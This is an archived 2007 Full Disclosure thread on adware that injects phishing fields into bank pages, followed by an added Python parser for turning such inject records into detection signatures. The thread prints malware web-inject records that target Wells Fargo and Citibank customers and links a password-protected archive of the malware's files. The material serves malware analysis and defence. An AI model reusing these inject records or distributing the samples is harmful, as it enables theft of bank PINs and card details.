Full Disclosure mailing list archives
Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..
From: "Net Tech" <net.tech11 () gmail com>
Date: Tue, 13 Mar 2007 13:36:10 -0400
Why is this "genius" sending virus infected attachments to the list? The Trojan Horse Infostealer.Bancos.Z is attached to his "research data"... it steals passwords and logs keystrokes entered into certain financial Web sites.

On 3/12/07, Thierry Zoller <Thierry () zoller lu> wrote:

Dear list,

Whoever deals with these people and thinks they are a benign Adware company (and thus spreads their bundles), check this:

Ignoring the fact that they basically install a Rootkit, I attached a few files I reversed. They install a DLL that does not directly KEYLOG your banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page asking you to enter more details (like PIN, Magic Password etc), then captures that data and transmits it (I did no further investigation).

http://secdev.zoller.lu/system32.zip
Pass: 123

I am disgusted. They even created their own XML parser for this ...

An extract of HTML code they inject:
-------------------------------------
<inject url="wellsfargo" before="name=userid autocomplete='off'></DIV>" what=" <DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin autocomplete='off'></SPAN></DIV> " block="alt=Go" check="pin" quan="4" content="d" > </inject>
------------------------------------

Attached the main files (pass 123), feel free to add this as HIPS or whatever signatures; those interested in a complete reversal can contact me to receive the EXE in question. I have no more time, feel free to dig deeper.

I especially liked this:
------------------------
<inject url="citibank.com" <TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR>

Puke..

--
http://secdev.zoller.lu
Thierry Zoller

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
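The two `<inject ...>` fragments Zoller quotes are the piece of this a defender can act on: they name the targeted site, the trigger ("block"), the fields the DLL adds to the genuine page and the lure text the victim sees. The following is an added triage helper, not code from the post or from the adware; it treats the records as the pseudo-XML they are (attribute values contain raw `<` and `>`, so a real XML parser rejects them, which is presumably why the authors wrote their own) and extracts signature-ready rows from a config dump. The `CONFIG` string is the extract from the post, re-typed here as sample input; the meaning of `quan` and `content` is not documented on the page, so they are carried through untouched, and the second record, which is truncated in the post, is reported as malformed rather than dropped.

```python
"""Triage helper for the form-inject records quoted in Zoller's post (added example)."""
import re
from dataclasses import dataclass

# Constructed sample input: the two fragments quoted in the post, re-typed.
CONFIG = '''
<inject url="wellsfargo" before="name=userid autocomplete='off'></DIV>" what="
<DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin autocomplete='off'></SPAN></DIV>
" block="alt=Go" check="pin" quan="4" content="d" > </inject>
<inject url="citibank.com" <TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR>
'''

# One record runs from '<inject' to '</inject>', to the next '<inject', or to end of input
# (the second fragment in the post has no closing tag at all).
RECORD_RE = re.compile(r'<inject\b(.*?)(?:</inject\s*>|(?=<inject\b)|\Z)', re.S | re.I)
# Record attributes are always double-quoted in the sample; the values contain raw HTML.
ATTR_RE = re.compile(r'\b(\w+)\s*=\s*"([^"]*)"', re.S)
INPUT_RE = re.compile(r'<input\b([^>]*)>', re.S | re.I)
# Attributes inside the injected markup use double, single or no quotes.
HTML_ATTR_RE = re.compile(r'''(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))''', re.S)
TAG_RE = re.compile(r'<[^>]+>')


@dataclass
class InjectRecord:
    url: str      # substring matched against the visited site
    before: str   # anchor in the genuine page after which the markup is inserted
    what: str     # markup inserted into the genuine page
    block: str    # attribute of the element whose activation triggers capture (as read from the sample)
    check: str    # name of the field whose value is checked/captured
    quan: str     # semantics not documented on the page; carried through as-is
    raw: str      # everything between '<inject' and the end of the record

    def injected_inputs(self) -> list[dict]:
        """Form fields the record adds to the page, as lower-cased attribute maps."""
        fields = []
        for m in INPUT_RE.finditer(self.what):
            attrs = {}
            for a in HTML_ATTR_RE.finditer(m.group(1)):
                attrs[a.group(1).lower()] = a.group(2) or a.group(3) or a.group(4) or ""
            fields.append(attrs)
        return fields

    def lure_text(self) -> str:
        """Visible text the victim is shown, with tags removed and whitespace collapsed."""
        body = self.what or ATTR_RE.sub("", self.raw)   # truncated record: fall back to raw
        return " ".join(TAG_RE.sub("", body).split())

    def harvests_secret(self) -> bool:
        """True when an added field is a password input or is the one named by 'check'."""
        fields = self.injected_inputs()
        names = {f.get("name") for f in fields}
        types = {f.get("type", "").lower() for f in fields}
        return "password" in types or (self.check != "" and self.check in names)


def parse_config(text: str) -> list[InjectRecord]:
    """Split a config dump into records; missing attributes become empty strings."""
    records = []
    for m in RECORD_RE.finditer(text):
        raw = m.group(1)
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(raw)}
        records.append(InjectRecord(
            url=attrs.get("url", ""), before=attrs.get("before", ""),
            what=attrs.get("what", ""), block=attrs.get("block", ""),
            check=attrs.get("check", ""), quan=attrs.get("quan", ""), raw=raw))
    return records


def summarize(records: list[InjectRecord]) -> list[dict]:
    """One signature-ready row per record: target, trigger, added fields, lure text."""
    return [{
        "target": r.url,
        "trigger": r.block,
        "fields": [f.get("name", "?") for f in r.injected_inputs()],
        "lure": r.lure_text(),
        "harvests_secret": r.harvests_secret(),
        "malformed": r.what == "",
    } for r in records]


def page_shows_inject(page_html: str, record: InjectRecord) -> bool:
    """Does a captured page (e.g. a DOM dump from a suspect machine) already carry the injected markup?"""
    def norm(s: str) -> str:
        return " ".join(s.split()).lower()
    return bool(record.what) and norm(record.what) in norm(page_html)


if __name__ == "__main__":
    for row in summarize(parse_config(CONFIG)):
        print(row)
```

Run against the extract, the first record resolves to target `wellsfargo`, trigger `alt=Go`, one added field `pin` of type `password` (flagged as harvesting a secret), lure text `ATM PIN:`; the second resolves to target `citibank.com` with the red "To prevent fraud ..." lure and is flagged malformed because its `what` attribute is missing. The rows are what you would feed into a host or proxy signature, and `page_shows_inject` is the check to run on a DOM dump from a machine you suspect is carrying the DLL.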